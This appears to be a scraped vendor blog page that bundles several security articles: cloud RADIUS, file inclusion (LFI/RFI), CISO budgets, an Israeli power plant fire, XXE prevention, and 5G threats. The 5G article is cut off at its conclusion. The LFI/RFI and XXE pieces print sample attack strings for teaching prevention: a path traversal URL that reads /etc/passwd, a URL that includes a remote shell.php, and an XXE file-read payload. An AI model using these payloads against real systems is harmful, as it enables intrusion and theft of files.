Skip to content

The Benefits of Moving Your RADIUS Server to the Cloud

Remote Authentication Dial-In User Service (RADIUS Authentication) authenticates and authorizes users trying to access a network by sending client access requests to a RADIUS server. The requests are formatted with data such as the client’s password, username, port, and IP address which are then examined in the database for matches.

Leveraging RADIUS in your organization can strengthen your network security through centralized authentication and enhanced access controls. RADIUS servers can be very useful in many contexts, and migrating it to the cloud can be used with WiFi access points and VPNs. By shifting to the cloud, RADIUS becomes more centralized within an organization’s core infrastructure.

The Advantages of Shifting RADIUS Server to the Cloud:

 Added Security Benefits: A RADIUS server gives room for unique user credentials which mitigates the threat of hackers infiltrating a network, WiFi since there is no shared fused password among several people.

  • Reduces the Hassle of Password Management: With unique credentials, a shared password does not need routine changing since every person manages their own. This saves time for IT administrators and eliminates the need for users to routinely update passwords.
  • Benefits Enterprise Networks with Multiple IT Admins: With a RADIUS server, it is extremely easy to control who and what has access and when. Only authorized users have access   sensitive information with a large organization’s network. VLAN segmentation through attributes critical characteristics of RADIUS-driven networks.
  • Centralizes User and System Authentication: IT admins have only one contact point for managing user’s password management, authentication, and authorization.
  • Easy Integrations with Existing Infrastructure: Modern RADIUS servers can easily integrate with any IT infrastructure currently in place. The extent of flexibility means that you can use cloud RADIUS with other infrastructure that you already set up, and this benefit can be enjoyed with the traditional setup.
  • Easy Activation and Deactivation: RADIUS servers are typically handled by a third-party provider which helps reduce workloads for resource-light IT admins point their network to the cloud RADIUS endpoints for authentication.
  • Secure VPN Authentication: Not only does RADIUS authentication securely connect users to WiFi networks, but it also works with VPNs. This ensures that only authorized users can access your network through your company VPN.
  • Enables 802.1x: 802.1x uses Extensible Authentication Protocol (EAP) for shifting authentication packets between two parts. EAP is highly versatile, making it easy to add to an existing infrastructure. 

Cloud-based RADIUS servers can serve as a great authentication solution that provides immense benefits without the hassles of managing and maintaining on-prem hardware.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

File Inclusion Vulnerabilities (LFI and RFI)

There are two types of File Inclusion Vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI).

These inclusion vulnerabilities are very similar to Directory Traversal attack. I will explain more regarding the differences in the section below.

To perform this attack, the attacker needs to target an application with file saving logic and logic for retrieving files in UI. The logic for saving the file is crucial because that can be a way to access the target server files and then include it in the script from your machine. In theory, the logic for retrieving the file in UI is not crucial to perform this attack. Still, it is very important because the attacker can intercept the request, investigate, and check which information can be helpful for him to perform the attack. 

We will manipulate the parameter in URL, as we did before in one of the articles when explaining the Directory Traversal attack. 

LFI loads local files such as “etc/passwd,” but then, on the flip side, RFI can load from an external source outside the server.

*Why will you always find examples of these attacks using this plain text file “passwd”?

This file is handy cause it contains information such as the list of registered users (id, group id, home directory, etc.) And it can be accessed because it has read permission with the ability to map user ids to users’ names.

Difference between Directory Traversal and File Inclusion Vulnerabilities

In the Directory Traversal article, I gave simple examples of this attack and some prevention tricks you can use with JS, Angular, or C# libraries.

File Inclusion and Directory Traversal look very similar, but they have one huge difference: the possibility of executing files within the attack.

File inclusion vulnerabilities allow you to load and execute a file in the application. On the other hand, performing a directory traversal attack file is just reading the files.

I will give an example after in the text, but here I am just going to explain one case scenario so you can better understand:

In the application, we can browse to the file and save it. After investigating the GET request when returning the file, we see that the URL will be changed because it would contain the name of the file in it. That means we can manipulate the name and save it as a file path to a specific target file in our machine. That file can be .txt, PowerShell (.ps1), etc. The file will probably contain a script with malicious code, which will then be executed on the target server. That is an example of a Remote File Inclusion attack!

How to test if your application has File Inclusion Vulnerabilities?

It is essential to test the code while developing. In this case, the developer needs to test it by himself, not just using some of the tools I mentioned in the Directory Traversal article. Also, I think it is important to see if the attacker can access folders and files. Also, even if folders are restricted using permissions, the developer should test out if it can be easily bypassed.

Summary:

First step: While preventing this attack, you should know if your application gives you the possibility to access files (if it has file inclusion vulnerabilities)

Second step: Check if the attacker can access the file even with folder/file permissions.

Examples of Local File Inclusion

For example, we have an application that uses this input field to enter the file’s name, and by clicking on the Include button, the file will be uploaded.

When you successfully upload the file, and you preview it, the URL will change to this:

http://test.com/testController?file=test.php

The attacker starts by exploring how the code is written to understand the used logic and find information where the file is saved. 

We can start with “making a mistake” when trying to import a file because some warning or error would occur. When a warning or error occurs, that is often done by the response of an HTTP request. Each HTTP request is visible in Development Tools, and you can see the header, body, URL which hits, etc. The body is used when you send a payload; for example, this file we are trying to upload.

Then easily, you can check out the structure of the payload or what the API is expecting, so if you want to replace the structure with a malicious one, you will know how it will pass. 

*Note: You probably know that the structure of the object you are sending to API from UI needs to be the same as the object that API expects. If not, the mapping would not be successful, and you will not hit even the controller in API.

So, you first want to mistake and analyze what is returned error/warning message. 

As you can guess, we need to focus on error/warning messages.

We should try to catch all the exceptions and make them custom with some user-friendly message. With that implemented, you should avoid sending some information that would uncover sensitive information with the API. For example, which method is used, what is expected, file path, etc.

In one of the examples I found on the internet, I saw that even this message can be retrieved:

What information this warning message uncovers?

First, this is a PHP application that uses using include method. As stated on site W3Schools“The include (or require) statement takes all the text/code/markup that exists in the specified file and copies it into the file that uses the include statement.”

This method tries copying some file with the name hi and giving it the extension “php.” File location is also visible: “/var/www/html”.

So, as you see, this warning uncovers so much information: 

  • used method, so we know the logic of the application

  • we need to bypass adding the extension 

  • file path, so we know how many “../” we will use or how we will “walk” through the folders. You probably already guess that in this stage, we can use the Directory Traversal technique “../”.

What would the attacker use if we would like to manipulate and check out registered users in etc/passwd

http://test.com/testController?file=../../../../etc/passwd%00

%00 – null byte would be used for ignoring all characters after null byte, including extension.

If this passed successfully and passwd doesn’t have restricted permissions, the content would be readable, but if permissions are there, that is our next focus.

It is great that we didn’t forget to add permissions to files containing sensitive data, but it is very important to try to avoid permissions and see how safely we implemented them.

To test that, we could create test requests with Burp Suite or maybe use CURL, or Postman.

We should pay attention to testing credentials or cookies because sensitive data can be manipulated there.

In one of the following articles, I will cover best practices for implementing good credential and session management to avoid a problem with broken authentication. 

Examples of Remote File Inclusion

For this type of attack, we will save the file name that would be the file path to some malicious script on the attacker server.

This would be an example of a URL that targets malicious script on some domain.com site:

http://test.com/testController?file=http://domain.com/shell.php

So, this will save the path, and when the path is called, it will execute shell.php – a malicious script in which some code targets the system to extract some data. 

*Focus on validating inputs in UI, so the malicious input parameters don’t even get to the API!

Important reminder for using trusted third-party libraries for validation

If you check out the logic in libraries, you can see how to expand it to cover some specific cases for your application.

Modification can be done by creating a wrapper over the libraries class or even making some script with an extended logic.

Also, always check and upgrade the version of third-party libraries!

Conclusion

Prevention is very important to avoid these vulnerabilities, but testing is equally important.

If you are a software developer, you know that to be a good developer, you must also have developed testing skills as much as coding skills.

You should use all available tools to screen these types of vulnerabilities but remember that you should trust your knowledge the most!

Don’t forget to give the code to testers because the person writing the code can often overlook some cases. Mostly because while coding and trying to write secure code, they might assume that the attacker will attack in a certain way.

If you are a developer, the best practice is to always be familiar with new attack techniques.

In the end, secure code is the cheapest code!

#LFI #RFI #vicarius_blog

Cover photo by Kevin Ku

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

How CISOs Can Stretch IT Security Budgets

The global annual cost of cybercrime is now an eye-watering $6 trillion. To put this into perspective, if cybercrime were a country, it would be the world’s third-largest economy after the US and China 

The cybercrime landscape has changed dramatically over the last decade. For example, ransomware was 57 times more destructive in 2021 than in 2015. The average cost of data breaches continues to rise every year. Moreover, the COVID-19 pandemic has changed how we work – more people are working remotely and from their own devices. This means cybersecurity teams have less insight into what employees are doing, and as a result, Shadow IT is becoming an even bigger problem.  

But how do chief information security officers (CISOs) navigate this increasingly hostile cyber threat landscape in a world where IT security budgets are tightening? With the US economy on the brink of a recession, cybersecurity budgets are tighter than ever. As a result, CISOs need to do more with less and develop a new and robust IT security strategy. That’s what we’re going to be diving into today.  

Ways to Stretch IT Security Budgets

1. Get More From Your Existing Tools

As the number of data breaches has skyrocketed over recent years, so have the technologies we deploy to stop them. For example, the average small business uses between 15 and 20 IT security tools, while medium-sized companies use 50 to 60, and enterprises use over 130 IT security tools. But how many of these companies are using their cybersecurity tools to their full potential?  

It’s a good idea to evaluate and consolidate your existing cybersecurity tools. For example, you might find that one tool can do everything another tool can do or that you have a significant overlap in functionality across your arsenal. Getting rid of redundant tools not only saves money but also makes it easier to manage your cyber threat landscape. Or in other words, the more tools you have, the higher the probability of misconfigurations, patch management issues, and privileges and password management issues.  

If you’re unsure just how far specific tools can go, you can ask the vendor for free or low-cost training to help fill in the gaps. Moreover, opening a line of discussion with your IT security vendors can also give you valuable information about what tools can offer heightened protection in the future. For example, you might find that one vendor is imminently about to release a new security feature that addresses a critical security concern in your industry.  

2. Choose Automated Tools

Automation has come a long way in cybersecurity, and it’s even more potent today with cutting-edge technologies like artificial intelligence and machine learning. With automation technology, IT security systems can sense, study, and stop cybersecurity threats automatically and before they escalate into a fully-fledged security incident. Today we see automation, AI, and machine learning deployed across security tools, including network security tools like Network Penetration Testing tools, Network Intrusion Detection Systems, and in other areas like vulnerability management, security logging, and Security Information and Event Management (SIEM).  

However, it’s critical to note that most cybersecurity experts don’t recommend leveraging automation to replace staff. Automation can boost efficiency and reduce human errors, but it’s no match for a highly skilled security professional. Essentially, by investing in automation, your existing cybersecurity staff become freed up to work on more complex tasks.  

3. Make Your Case for More Funds

Getting the funds you need to provide effective network security can be challenging. As a CISO, you’re competing with other senior-ranking IT staff for your fair share of the IT budget.  

According to a Deloitte report, around 6% to 14% of the IT budget goes to cybersecurity for the average business. So, if your team is getting significantly less than this, you might want to consider why. Are your budget decision-makers unconvinced of the need for cybersecurity? Do they have doubts about its effectiveness? And what can you do to prove that more upfront investment is substantially cheaper than a costly cyber attack? 

When you go into budget discussions, you must have a good grip on the data and any upcoming concerns in the industry. For example, during COVID-19, we saw a massive spike in ransomware attacks. And today, Crime-as-a-Service (CaaS) tools are dramatically lowering the barrier to entry for would-be hackers. So much of cybersecurity is about anticipating your opponent’s move and being prepared before they strike. This means you have to pay attention to emerging trends just as much as current threats when detailing your cybersecurity budget.  

4. A More Creative Approach to Staffing

Employees will always be a dominant part of your IT security strategy, but they also make up a significant percentage of organizations’ IT security budgets. So, how do you ensure you’re spending your money wisely while getting the IT security skills you need? 

First, you need to set your sights beyond your local area. Skilled cybersecurity professionals are in high demand, but the talent pool is small. Moreover, the cybersecurity skills gap continues to widen every year. In the era of remote working, CISOs have never been in a better position to recruit security workers from different geographical areas.   

And on the point of the cybersecurity skills gap, companies need to be more creative in combating this issue. What do we mean by this? Well, many HR teams have a poor understanding of the skills or qualifications needed to be an effective IT security worker. As a result, they might filter out candidates without specific qualifications despite this being easy to remedy with training.  

You can recruit people with practical skills or look for people with these skills in-house. For example, technical aptitude, problem-solving skills, attention to detail, communication skills, fundamental computer forensics skills, and a desire to learn are crucial skills that often take a back seat to a specific certification in the recruiting process.  

 Additionally, you might find it’s more cost-effective to outsource parts of your cybersecurity function than to build the perfect team in-house.  

Final Thoughts on IT Security Budgets

The consequences of not investing in robust IT security are clear – costly fines, successful data breaches, and hefty reputational losses. CISOs know this, and so do the wider IT function. However, with an economic downturn looking ever more likely, CISOs will have to get more creative with their cybersecurity budgets or risk being left even more vulnerable.  

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

Did Iranian Hackers Cause The Fire At An Israeli Power Plant?

Almost immediately after a fire broke out in an active power plant in southern Israel on July 14, 2022, an Iranian hacking group claimed responsibility. While it’s understandable why the group, which goes by the name #Altahrea, would want to boost their hacker profile by saying they caused the fire, there is ample evidence that they actually had nothing to do with it. 

The Orot Yosef power plant, part of the Edeltech group, is located in Ramat Hovav, Israel and has been in operation since 1989. 

Orot Yosef Power Plant

To understand why we believe this fire was not the work of hackers, let’s take a look at how this plant operates and what might have happened to cause the fire. (SCADAfence’s security team research lead Yossi Reuven also spoke about the attack to Techmonitor.ai)

Gas turbines can be used in conjunction with steam boilers by passing hot gasses from the boiler through a gas turbine to produce mechanical drive for electricity generation. This combined arrangement is commonly referred to as “cogeneration.” Cogeneration is thermodynamically the most efficient method for generating electrical power, and it is the method used by the Orot Yosef facility. 

Why is this important? Understanding the process used by a facility is crucial to determining what event took place. Gas turbines require a correctly ratioed air-to-fuel mixture to operate. Running a turbine too rich or too lean, (too much air or too little air, respectively) can cause significant damage to the turbine. This means that if someone with malicious intent were able to compromise the air handling and run the turbine at maximum output with a lean mixture there is a good chance of detonation, overheating, loss of power, and damage to the turbine. These issues would all relate to the turbine housing and be far more catastrophic of an event.

We know that GE turbines were purchased and installed in the plant in 1989 as you can see in the image below from the Global Energy Observatory. (The GEO is a publicly available database of global energy information)

GEO entry for Orot Power Plant

The Power Plant Fire 

Shortly after the fire began, the Iranian hacker group #Altahrea posted a photo on Telegram of a fire that looks to have started in the building known as the, “Air Filter House”.

Most of the technology that resides inside the filter house is there to detect if the system is clogged. When a clog happens, it triggers the shutdown of the turbine to protect it from too much debris passing through the filter system, which can shorten the lifespan of the turbine.

Fire is a major risk for filter houses that have poor maintenance cycles. If filters are not replaced routinely, particulates and debris build up and all it takes for the filter cartridge pairs to go up in flames is a single spark. 

Based on open-source intel, it is likely that this facility is running an Electrostatic Precipitator.Power plant information from open source database

An Electrostatic Precipitator is typically used for pollution control to remove dirt from flue gasses in exhaust systems. Due to the fact that this facility has the ability to use Diesel as a secondary source of power generation, it is possible that an ESP could be present.

Another detail that provides relevant information is a redacted picture of Shodan.io’s Industrial Webcrawler revealing a Phoenix Contact EMpro PLC running a Webserver exposed to the internet as shown below.

Shodan.io shows information on the Phoenix Contact EMpro

The EMpro is used to measure voltages and current in a power supply system. The measure is used primarily to manage critical load balancing across a system and not for any critical process control of the filter house. If the device were to be compromised it would only allow an individual to carry out relatively small actions, and this is only in the event that the device had the Digital Output wired up.

This all begs the question, is it possible that a remote monitoring device was compromised in a way that allowed an adversary to trigger a discharge inside the filter house which then ultimately triggered a fire. Possibly. However it would require ideal conditions for this to happen and would also require a lapse in maintenance with a buildup of debris etc. I would expect that the same level of probability would occur if someone discarded a cigarette that was still lit and the filter house consumed it into the filter cartridge stage. In this case, that is a more likely cause of the fire, and not the Iranian hackers who claimed credit. 

To learn more about how the SCADAfence Platform can protect your OT network request a demo today.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SCADAfence
SCADAfence helps companies with large-scale operational technology (OT) networks embrace the benefits of industrial IoT by reducing cyber risks and mitigating operational threats. Our non-intrusive platform provides full coverage of large-scale networks, offering best-in-class detection accuracy, asset discovery and user experience. The platform seamlessly integrates OT security within existing security operations, bridging the IT/OT convergence gap. SCADAfence secures OT networks in manufacturing, building management and critical infrastructure industries. We deliver security and visibility for some of world’s most complex OT networks, including Europe’s largest manufacturing facility. With SCADAfence, companies can operate securely, reliably and efficiently as they go through the digital transformation journey.

XML External Entity (XXE) Attack

In this article, I will write about the XML External Entity attack. For this attack to occur, the application must have logic for parsing XML input.

This injection will happen if there is a weakly configured XML parser. A successful attack would be if the attacker would be able to view files on the application server and interact with the backend. This XXE vulnerability could be used to perform server-side request forgery (SSRF) attacks, denial of service (DoS) Billion Laughs Attack, and many more.

What are XXE types?

There is no strict classification of XXE attacks, but we can divide them into two types: in-band and out-of-band(blind).

· In-band are more common than out-of-band ones. In this case, the attacker will receive an immediate response to the XXE payload.

· Out-of-band or so-called Blind XXE, there is no immediate response. This type involves the creation of an external Document Type Definition. For this type, the XML parser also needs to make an additional request to an attacker-controlled server.

What are the cases when attacker can execute this injection?

· In old applications where the version of SOAP is less than 1.2

· Applications where users are logged in based on their sessions – SAML(single sign-on (SSO) login standard). Chances for this attack to happen in this case can be very high because SAML uses XML for identity assertions

· If there are XML inputs or XML uploads into XML documents that can be added from untrusted data and parsed by an XML processor after that.

· There is a high risk when Document Type Definitions (DTD) is enabled

When would application parse XML?

XML is often used in both: frontend and backend web development.

Examples:

The Frontend side of the application can request, for example, an XML file from API and create and present a UI form based on the data in XML. Then we can have an option to add a new field into the form and if we would like to save the changes. Afterward, the XML input would be added into the XML document.

From the backend parsing, XML would be used to transfer the data in some standard format. Also, in mobile development, Android applications use it to create layouts and store configurations.

On the OWASP site, you can find more examples of XXE attacks. Portswigger has a nicely explained example of this attack:

For example, suppose a shopping application checks for the stock level of a product by submitting the following XML to the server:

The application performs no particular defenses against XXE attacks, so you can exploit the XXE vulnerability to retrieve the /etc/passwd file by submitting the following XXE payload:

<?xml version=”1.0″ encoding=”UTF-8″?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///etc/passwd”> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>

This XXE payload defines an external entity &xxe; whose value is the contents of the /etc/passwd file and uses the entity within the productId value. This causes the application’s response to include the contents of the file:

Invalid product ID:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin

List of preventions for XXE

  • Using JSON instead of XML and avoiding serialization of sensitive data
  • As I mentioned before, this attack can happen easily when the application is using SOAP < 1.2, so try to update to the higher version
  • Implement XSD validation in your application (“XML Schemas”) for all XML file inputs
  • Patch or upgrade all XML libraries
  • Use SAST tools for checking out if there are XXE vulnerabilities.

How to prevent if you are using SAML?

SAML language is used to construct authorization statements, whose authenticity is protected by the XML digital signature applied over the statements.

Many attacks happen because of wrong assumptions made by developers; for example, the token is always properly formed XML compliant with SAML schema.

The developers can assume that SAML would have just one Assertion tag in the document (the properly formed SAML would have). With that fact, developers can validate just the first element they get when searching for elements by the tag name in the XML document.

To get list of nodes JS “getElementsByTagName” method can be used:

NodeList xmlNodes = doc.getElementsByTagName(“saml:Assertion”);

To xmlNodes will be assigned the list of matching elements from document with tag Name “saml:Assertion”.

As developers can assume that this is the properly formed SAML with one Assertion tag, they will get the first element and validate it after:

let firstElement = (Element)xmlNodes.item(0);

*As you can guess, this is not the proper way to validate the tag because the attacker can also assume that developers used this approach for the validation. In this case, the attacker can catch the first element (tag) and replace it with a malicious assertion before the original one, and it will never be detected.

With the same logic, some developers use “getElementsByTagNameNS” but the result would be the same: easily inserted malicious script in the first element.

Proper prevention would be:

· Parsing the XML document. Using structure validation based on the supplied schema. Never allow automatic download of schemas from the third party but prefer to use local trusted copies. It would also be good if it is possible to inspect schemas and perform schema hardening. This could be used to disable possible wildcard types or relaxed processing statements.

· Digital signature validation, which verifies the authenticity and integrity of the assertion embedded in the SAML document. This prevents forgery.

**Most important when writing schema is to describe the intended document’s structure precisely.

How to prevent using XSD validation?

I will explain how to create a C# solution to validate XML data.

The most important reason we want to use XSD (XML Schema Definition) validation is that we want the sender and receiver to have the same “expectations” about the content. Using schemas, we need to describe exactly the data so both parties would be clear about them.

Steps:

· Add XML file into the code

When adding XML file, you will just see xml tag:

<?xml version=”1.0″ encoding=”utf-8″ ?>

I will add object User with properties FirstName, LastName, Address, so xml file would look like this:

· Create XML Schema for this file

You will get XML schema structure like this:

· Modify XSD

Now you can modify the file- add validations for FirstName and Address. In this case, I just show how to add validations for these fields, but they will, of course, not prevent the attack; they will just validate the length and the type of mentioned fields.

· Validate XML using XSD

What am I doing in the code?

  • Getting the local path of Assembly so I can after add XML file name and XSD file name to get their full paths
  • Creating schema using XmlSchemaSet and XmlSeverityType which are from System.Xml.Schema
  • Using XMLReader from System.XML so I can create XDocument imported from System.Xml.Linq
  • When I create document, I want to use validate method that class has and pass schema by which I will validate and the method ValidationEventHandler (I named it like that) which is throwing exception if type is error. In this method you should add all validation logic.

This is just an example on how to create XSD for XML file and which libraries you can use for the validation.

How to prevent with implementation of DTD?

We can also validate XML file using DTD. Here are some differences between XSD and DTD on site.

In this example, I am validating an XML file using a DTD file with DtdProcessing.

Steps:

  • Setting the validation settings using XmlReaderSettings
  • Creating the XmlReader object so I can parse the file using the method read()
  • Creating ValidationEventHandler method which is throwing an exception if the type is an error. In this method, you should add all validation logic.

List of SAST testing tools

SAST testing tools will help you with static application security testing.

SAST tools can be free, commercial, and open-source tools.

A list of the most popular SAST Tools currently are:

  • Veracode
  • LGTM
  • Checkmarx
  • Klocwork
  • Reshift
  • SpectralOps
  • HCL AppScan
  • Codacy
  • Insider CLI
  • Argon

         

Why is SOAP version < 1.2 vulnerable to XXE attack and why you should use later versions?

 

Before version 1.2 external entities were allowed within SOAP messages.

Since version 1.2 some changes were introduced to the envelope and encoding schemas. Both schemas have been updated to be compliant with the XML Schema Recommendation.

You can see the list of recommendations which were used:

· http://www.w3.org/TR/2001/REC-xmlschema-1-20010502/

· http://www.w3.org/TR/2001/REC-xmlschema-2-20010502/

· http://www.w3.org/TR/1999/REC-xml-names-19990114

· http://www.w3.org/TR/2000/REC-xml-20001006

· http://www.w3.org/TR/2000/PR-xlink-20001220/

Also, additional changes occurred in this version, within the names of datatypes in the XML Schema specification, and some datatypes were removed. If you want check out all changes which were made you can go to this site.

 

Conclusion

This article presented some prevention steps that could help you defend your application from XXE attack.

The OWASP team, which is constantly working to discover new ways the attackers can exploit your application and perform their malicious actions, are always updating their Prevention Cheat Sheet.

The best way to secure your application would be to always be up to date with the new prevention ways: best libraries to use, best detection tools, etc.

In the end, secure code is the cheapest code!    

Cover photo by Joshua Woroniecki

#XXE_attack #XSD #DTD #SAML #vicarius_blog

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

5G Network Security: What You Need to Know

The emergence of 5G wireless technology is no longer news to the world. Organizations and cyber security experts alike look forward to its higher speed, increased capacity, and lower latency. The 5G wireless network also boasts interactive applications, improved communication, increased labor productivity, and lower costs. 

Moreover, 5G intends to provide more extensive broadband access which is good news for gamers, online video content developers, and other multimedia resource users. However, as intriguing as the pros sound, experts warn of its potential downsides.  

An area to critically examine and prepare for is cybersecurity. Online networks and systems have been prone to security vulnerabilities. From 2G to 4G, there have been issues confronting the wireless technology space, and 5G is no different. Also, threat actors are on the prowl as the technology undergoes perfection, ready to strike.  

There’s no telling the extent of damage in creation though it’s inevitable  that new methods of attack will spring up. There’s also the possibility of  cyber criminals amplifying their mode of attacks using the new technology. What every enterprise needs is a solid course of action for securing their 5G systems. 

In this article, we intend to provide the necessary overview of the security threats facing the 5G network, and the solutions to these threats. Here’s what these threats look like: 

Critical Security Challenges With 5G

Companies must realize that the security challenges associated with 3G and 4G also apply to 5G. Despite its high level of security, there is a possibility of various potential vulnerabilities to a multitude of attacks.  A 5G connection of critical infrastructure will require top-notch security. Therefore, it becomes expedient to focus on crucial factors such as these to avoid cyber attacks and severe network disruption:

Issues from a Co-existence Between 4G and 5G include:

  • First, enterprises must realize that 5G will require time to evolve alongside 4G, so 4G and 5G will co-exist for a good period of time. However, the transition promises to increase the bandwidth necessary for high performance lacking in the current networks. 
  • Organizations must also note that different operators and countries will move to 5G at their own desired pace. Additionally, Telecom operators must also take care of the security issues that come with the transition and interworking of previous networks. 
  • The co-existence of both networks requires that the security policy for threat detection and mitigation needs consistency and a holistic approach.

Exposure to the Internet of Things (IoT)

The internet of things, which focuses on connectivity and data exchange over the internet, will experience some ruffles. However, the 5G technology will improve some of its use cases. The question here is how prepared organizations are to defend against exposure vulnerabilities. 

IoT products are highly vulnerable devices because of their ease of use and connectivity  which cybercriminals will inevitably exploit to spring attacks. 5G also has enhanced connectivity, making spreading threats via IoT networks easy. More bandwidth will allow hackers to generate powerful and overwhelming DDoS attacks on any organization’s network and services. 

New Attack Openings At The Network Multi-Edge Computing

The edge network focuses on application hosting and data processing movement from a centralized point to the network edge. Therefore, when a proper security mechanism is absent, a termination from IP connectivity is likely.  

 Most edges are susceptible to various attacks from the public internet. There ares easy ways which threat actors infiltrate or attack such as by by running third-party applications with virtual network functions (VNFs) on a single physical platform.  

In addition, rogue base station (RBS) threats have always been a significant source of concern for 4G, which remains a likelihood for 5G. RBS operates by diverting cell phone traffic to the desired location after spoofing the cell phone tower. They meddle with data, steal sensitive information, track users, and more. As a middleman technique, it puts the attacker in the heart of the network and its clients, opening the doors for immeasurable damage.  

Network Slicing & Virtualization

Network slicing is a form of virtualization that allows running multiple logical networks on shared physical network infrastructure. It allows mobile service providers to partition network resources allowing them,  to look into various sets of use cases. 

Network slicing also allows the authentication of users for only one network area. It makes data and security isolation quite possible. However, the issue is that slices add complexity to the network and can be challenging to manage. Ordinarily, a compromise on any slice need not impact the others. But configuring one network isn’t the way of operation. Instead, configuration involves many slicers with more significant service requirements. 

The 5G networks currently lack precise specifications on developing and implementing security for network slicing. However, there are defining standards and specifications for building the network. The issue is that improper management of the network slice creates avenues for malicious actors to gain access. 

Software-Defined Networking & Network Function Virtualization

Networks built on software-defined networking (SDN) and network function virtualization (NFV) operate differently from traditional networks. NFV infrastructure functions like firewalls, routing, and SD-WAN. It gets installed as software through abstraction. On the other hand, SDN separates a control plane from a forwarding plane.   

Switching to SDN/NFV requires a change in network infrastructure and the appearance of new elements. Both infrastructures pose threats like forwarding device attacks and traffic spoofing.   

Signal Interference 

The 5G technology promises a lot of advantages. However, it also poses a threat to specific sectors. For instance, the transport segment of the economy has raised some concerns. A likely threat to the transport enterprise is the proposed signal interference by the 5G network. There’s a projection of it causing harmful interference to radar altimeters on all civil aircraft types.   

However, interference is not a new phenomenon in the wireless network. Therefore, a need for proper mitigation becomes expedient. Also, other wireless technologies need to pay close attention to site surveys. The goal is to discover the extent of challenges from signal penetration. Both networks operate in the same frequency bands. For this reason, organizations should remember that the same sources of interference affecting 4G are likely with 5G.  

How to Prepare for 5G Network Security Threats 

Without a doubt, 5G is going to be a game-changer. However, security is a critical aspect of its successful delivery of services. Furthermore, the survey conducted by AT&T on 451 respondents shows a high-security threat expectancy. Therefore, stakeholders must carefully plan their security strategies in the 5G evolution roadmap. An excellent place to commence evaluation is the security challenges outlined in this article. 

To create a 5G security position, enterprises need to understand the potential threats. That way, putting up the necessary tools guarantees well-grounded defense. Also, taking advantage of available resources will help to anticipate and further plan for new security threats. One way to begin is to supplement their security with the features already available on the 5G technology. 

Enterprises must understand that identification and authentication will be crucial to 5G security. For this reason, multi-access edge computing nodes and IoT networks should devise vulnerability management programs. Organizations should also consider SDN and virtualization powerful elements in their preparation processes.  

Furthermore, in threat detection and intelligence, machine learning, and other artificial intelligence will come in handy. In addition, a zero-trust environment becomes highly recommended. Finally, due to the large number of devices involved, there’s the need to implement other sophisticated approaches to authorization and identity. 

Remember that organizations should and must take responsibility for covering all security aspects. The time is fast approaching when firewalls will no longer protect everything. Enterprise security teams should look into building 5G private networks to separate the most sensitive elements and other use cases.  

Organizations get to customize build-outs to meet their application requirements. They also function as alternatives to using network slicing for better security. However, given the high cost of building a private 5G network, there is the option of buying or leasing. Whatever the option, the paramount goal needs to be security management. 

5G Network Security: Final Thoughts  

